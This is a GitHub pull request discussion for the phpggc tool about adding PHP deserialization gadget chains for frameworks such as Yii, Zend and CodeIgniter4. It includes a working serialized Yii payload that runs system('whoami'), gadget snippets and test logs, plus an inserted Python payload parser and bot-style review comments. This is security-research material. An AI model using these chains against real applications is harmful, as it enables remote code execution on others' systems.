
add some gadget chains that I had collected #160

Open
wants to merge 31 commits into base: master from

Conversation

@CyanM0un (Contributor)

Hi,
I sorted out a few gadget chains of some frameworks. I have manually checked all of them, and some of them have passed the test-gc-compatibility script, for which I have modified the corresponding version range in chain.php.
It seems like no small work for both of us :)

@cfreal (Contributor) commented Sep 16, 2023

Hello CyanM0un,

That's amazing work! I'll try and integrate it in the upcoming weeks; as you have said, it is a lot of work :)

Charles

@cfreal (Contributor) commented Oct 9, 2023

Hello,

Still haven't had time to check this amazing work. Will do in the upcoming weeks !

@cfreal (Contributor) commented Mar 26, 2024

Hello,

I have started working on your GCs, CyanM0un. Every ZendFramework payload works except for FI1:

$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning:  Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
: 
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error:  Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
  thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !

Any ideas why ?

@CyanM0un (Contributor Author)

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

@CyanM0un (Contributor Author)

> Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

Maybe we should specify that the chain only includes arbitrary PHP files.

@cfreal (Contributor) commented Mar 27, 2024

Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.

@CyanM0un (Contributor Author)

I used the command composer create-project yiisoft/yii=1.1.20 yii1 to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. I kindly request your opinion :)

@cfreal (Contributor) commented Mar 27, 2024

Ok, I used the package present in their github repository.

Do you by any chance still have your vendor/composer/installed.json?
Now that I use your procedure, I get:

$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
  thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !

@CyanM0un (Contributor Author)

I don't think that's the problem ... I tested it just now using the package and it worked, e.g.:

<?php
// Bootstrap: the Composer autoloader supplies the PHPUnit Selenium and DocBlox
// gadget classes; YiiBase registers the framework autoloader that resolves
// CDbCriteria, CMapIterator and CForm.
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
// URL-encoded PHP serialization. The %00 bytes are the mangled markers of
// private/protected property names, and %2A is the '*' of a protected one.
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
// The chain fires from CDbCriteria::__wakeup() while unserialize() is running.
unserialize(urldecode($poc)); // system('whoami')

The error was triggered in PHPUnit_Extensions_Selenium2TestCase_Session::__destruct(); however, the GC's function call should be triggered and finished in CDbCriteria::__wakeup(). DocBlox_Parallel_Worker doesn't have the curl function because in gadgets.php I simply picked a class (DocBlox_Parallel_Worker) and assigned it to the driver field of PHPUnit_Extensions_Selenium2TestCase_Session, which should not influence the command execution.
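To make the structure of that PoC visible without a PHP interpreter, here is an added example (not code from the thread, from phpggc or from Yii): a small Python parser for PHP's serialization format that decodes the URL-encoded payload posted above, demangles the "\0*\0" (protected) and "\0Class\0" (private) property-name prefixes, prints the object graph, and lists the classes the payload instantiates, which is the list an allowed_classes whitelist passed to unserialize() would have to refuse. The only input is the payload string copied from the PoC; nothing is executed.

```python
import urllib.parse

# Payload copied verbatim from the PoC posted in the thread above.
YII_RCE3_PAYLOAD = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D"


class PHPObject:
    """A deserialized PHP object: class name plus {prop: (visibility, value)}."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _demangle(key):
    """PHP mangles non-public names: "\\0*\\0x" is protected, "\\0Owner\\0x" private."""
    if isinstance(key, str) and key.startswith("\x00"):
        _, scope, name = key.split("\x00", 2)
        return ("protected" if scope == "*" else "private:" + scope), name
    return "public", key


def _parse(s, i):
    """Parse one serialized value starting at s[i]; return (value, next index)."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "ibd":                                 # i:123;  b:1;  d:1.5;
        j = s.index(";", i)
        raw = s[i + 2:j]
        return {"i": int, "b": lambda x: x == "1", "d": float}[t](raw), j + 1
    if t == "s":                                   # s:<len>:"<bytes>";
        j = s.index(":", i + 2)
        n = int(s[i + 2:j])
        val = s[j + 2:j + 2 + n]
        if s[j + 2 + n:j + 4 + n] != '";':
            raise ValueError("bad string at %d" % i)
        return val, j + 4 + n
    if t == "a":                                   # a:<count>:{key;value;...}
        j = s.index(":", i + 2)
        count, i = int(s[i + 2:j]), j + 2
        out = {}
        for _ in range(count):
            k, i = _parse(s, i)
            v, i = _parse(s, i)
            out[k] = v
        if s[i] != "}":
            raise ValueError("bad array at %d" % i)
        return out, i + 1
    if t == "O":                                   # O:<len>:"Class":<count>:{...}
        j = s.index(":", i + 2)
        n = int(s[i + 2:j])
        cls = s[j + 2:j + 2 + n]
        k = s.index(":", j + 4 + n)
        count, i = int(s[j + 4 + n:k]), k + 2
        props = {}
        for _ in range(count):
            key, i = _parse(s, i)
            val, i = _parse(s, i)
            vis, name = _demangle(key)
            props[name] = (vis, val)
        if s[i] != "}":
            raise ValueError("bad object at %d" % i)
        return PHPObject(cls, props), i + 1
    raise ValueError("unsupported type %r at %d" % (t, i))


def parse_payload(url_encoded):
    """URL-decode and parse a payload; latin-1 keeps one char per byte so s:<len> matches."""
    data = urllib.parse.unquote_to_bytes(url_encoded).decode("latin-1")
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after offset %d" % end)
    return value


def classes_in(value, seen=None):
    """Class names the payload instantiates, in order of appearance."""
    seen = [] if seen is None else seen
    if isinstance(value, PHPObject):
        if value.cls not in seen:
            seen.append(value.cls)
        for _, v in value.props.values():
            classes_in(v, seen)
    elif isinstance(value, dict):
        for v in value.values():
            classes_in(v, seen)
    return seen


def describe(value, depth=0):
    """Render the object graph as indented text lines."""
    pad = "  " * depth
    if isinstance(value, PHPObject):
        lines = [pad + "object " + value.cls]
        for name, (vis, v) in value.props.items():
            lines.append(pad + "  " + name + " (" + vis + "):")
            lines += describe(v, depth + 2)
        return lines
    if isinstance(value, dict):
        lines = [pad + "array(" + str(len(value)) + ")"]
        for k, v in value.items():
            lines.append(pad + "  [" + repr(k) + "]:")
            lines += describe(v, depth + 2)
        return lines
    return [pad + repr(value)]


if __name__ == "__main__":
    root = parse_payload(YII_RCE3_PAYLOAD)
    print("\n".join(describe(root)))
    print("classes:", ", ".join(classes_in(root)))
```

The printed graph shows why the __destruct() error is a side effect rather than the trigger: the command ('system' under the protected commands array, 'whoami' under CMapIterator's private _keys/_key) is reached through CDbCriteria > CMapIterator > CForm > PHPUnit_Extensions_Selenium2TestCase_Session, and the DocBlox_Parallel_Worker in the driver slot is only there to give that Session a non-null driver.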

@cfreal (Contributor) commented Mar 27, 2024

Ok, I was missing the YiiBase import :) Making progress!

@CyanM0un (Contributor Author)

> Ok, I was missing the YiiBase import :) Making progress!

Indeed a mountain of work. 😂 Best respect to you.

@cfreal (Contributor) commented Jul 16, 2024

Hello @CyanM0un !

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?


class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
public static $version = '2.1.5 <= 2.5.3 & 2.11.2';
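Review bot: the version string '2.1.5 <= 2.5.3 & 2.11.2' does not name the Composer package the ranges apply to, and the lone '2.11.2' after the '&' reads as a single release rather than a range; state the package in the chain's description and, if 2.11.2 really is an isolated affected release, say so explicitly (or give its bounds) so that test-gc-compatibility is run against the intended versions.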
Contributor

Which package(s) are these versions for?

Contributor Author


class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
public static $version = '*';
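Review bot: $version = '*' claims the chain works on every release, including those that predate the gadget classes; pin the lower bound to the first release that ships them, and add an upper bound once the chain stops working, so that users do not run it against versions where it cannot fire.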
Contributor

Fixed version here: it starts at 1.7.0

Contributor Author

thanks!


public function __construct($path, $data)
{
$this->buffer = [["level"=>1,"message"=>$data,'datetime'=>new \Gelf\Message(),'level_name'=>'']];
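Review bot: \Gelf\Message is provided by graylog2/gelf-php, which Monolog lists only under require-dev, so the 'datetime' slot in this buffer record will be an __PHP_Incomplete_Class on any target installed without dev dependencies. If, as stated later in this thread, the chain only needs an object exposing getTimestamp(), PHP's built-in \DateTime already provides it and needs no third-party package: 'datetime' => new \DateTime().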
Contributor

Gelf\Message is not present.

Contributor Author

Again via composer create-project monolog/monolog=2.0.0 monolog. In fact, any class that has a getTimestamp method will be OK.

Contributor

Same: by default, create-project seems to include dev dependencies, while install does NOT.
We have generally refrained from including dev dependencies in GCs, as they are not often included.


class RCE10 extends \PHPGGC\GadgetChain\RCE\Command
{
public static $version = '2.0.0 & 2.1.0 <= 2.x-dev';
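Review bot: '2.x-dev' is a moving branch alias, not a release, so '2.1.0 <= 2.x-dev' has no fixed upper bound and will silently become wrong once the gadget is fixed in a later 2.x release; replace it with the last tagged 2.x version the chain was actually tested against.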
Contributor

fixed 2.x-dev to 2.9.3+

Contributor Author

thanks a lot!

{
$remote_path = $parameters["remote_path"];

return new \Keradus\CliExecutor\ScriptExecutor($remote_path);
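Review bot: \Keradus\CliExecutor\ScriptExecutor is only reachable through a require-dev dependency of php-cs-fixer, so it is absent after composer require friendsofphp/php-cs-fixer or composer install --no-dev and the chain will not unserialize on a production target; either document in the chain's description that it needs dev dependencies, or replace the carrier with a class from php-cs-fixer's runtime dependency tree.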
Contributor

Class missing after: composer require friendsofphp/php-cs-fixer=2.17.3

Contributor Author

Still via composer create-project friendsofphp/php-cs-fixer=2.17.3 phpcsfixer. I want to clarify that I'm not really that familiar with PHP development myself, so I'm not quite sure what the differences are between these ways of building.

Contributor

keradus is included as a require-dev dependency of php-cs-fixer, which is why I couldn't see it. It generally will not be present.


namespace Pop\Mail\Transport\Smtp
{
class EsmtpTransport
Contributor

Does not exist.

Contributor Author

Maybe because of the reason below, or composer install?

@@ -0,0 +1,15 @@
<?php
Contributor

Does not work against any versions, and version 4.7.0 does not seem to exist? Last being 4.3.4

Contributor Author

sorry about the confusion, I used the framework https://github.com/popphp/popphp-framework

$function = $parameters['function'];
$parameter = $parameters['parameter'];

return new \Prophecy\Argument\Token\ExactValueToken($function, $parameter);
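Review bot: Prophecy\Argument\Token\ExactValueToken belongs to phpspec/prophecy, which Slim only pulls in through its test (require-dev) dependencies, so composer require slim/slim:3.8.1 installs no Prophecy at all and the chain cannot unserialize on a production target; if the chain is kept, its description must say that it needs dev dependencies, otherwise the $function/$parameter carrier should come from Slim's runtime dependency tree.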
Contributor

composer require slim/slim:3.8.1 -> no prophecy

Contributor Author

the same reason for composer create-project slim/slim=3.8.1 slim

Contributor

Same, dev dep.

$function = $parameters['function'];
$parameter = $parameters['parameter'];

return new \phpDocumentor\Reflection\DocBlock\Tags\Method($function, $parameter);
Contributor

Same

Contributor Author

same as above

Contributor

Same, dev dep.


function __construct()
{
$this->writer = new \XMLWriter;
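Review bot: new \XMLWriter here only serializes to an empty XMLWriter object; on the target, unserialize() rebuilds it without running any constructor, so the openMemory() that the real class's constructor performs never happens and the first write through $this->writer is exactly the "Invalid or uninitialized XMLWriter object" failure seen in testing. If the chain's trigger path does not need the writer, drop this property from the gadget so the chain no longer depends on how a given PHP version unserializes XMLWriter.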
Contributor

Uncaught Error: Invalid or uninitialized XMLWriter object in .../vendor/phpunit/php-code-coverage/src/Report/Xml/Coverage.php:62

Contributor Author

I am also confused; this gadget works well on my computer. In fact, look at the __construct code:

public function __construct(DOMElement $context, string $line)
{
    $this->contextNode = $context;
    $this->writer = new XMLWriter;
    $this->writer->openMemory();
    ......
}

I can't figure out how this will happen ...

Contributor

What's your PHP version? It looks like it is due to deserialisation.

Contributor Author

PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:57) ( NTS Visual C++ 2017 x64 )

@CyanM0un (Contributor Author)

> Hello @CyanM0un !
>
> I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:
>
> $ composer create-project codeigniter4/appstarter=4.1.3 hello123
>
> and
>
> $ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
>
> Any ideas?

I used the second way; however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be included.

@CyanM0un (Contributor Author)

Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE!
(Actually, all the gadget chains in this pull request were discovered by our automation tool. I personally think it works very well and I wonder if you could help promote it when we open-source it hahaha :)

@cfreal (Contributor) commented Aug 1, 2024

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

@CyanM0un (Contributor Author) commented Aug 1, 2024

sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip

@nollium added the label "gadget chain" (This issue could yield a new gadget chain.) on Feb 26, 2025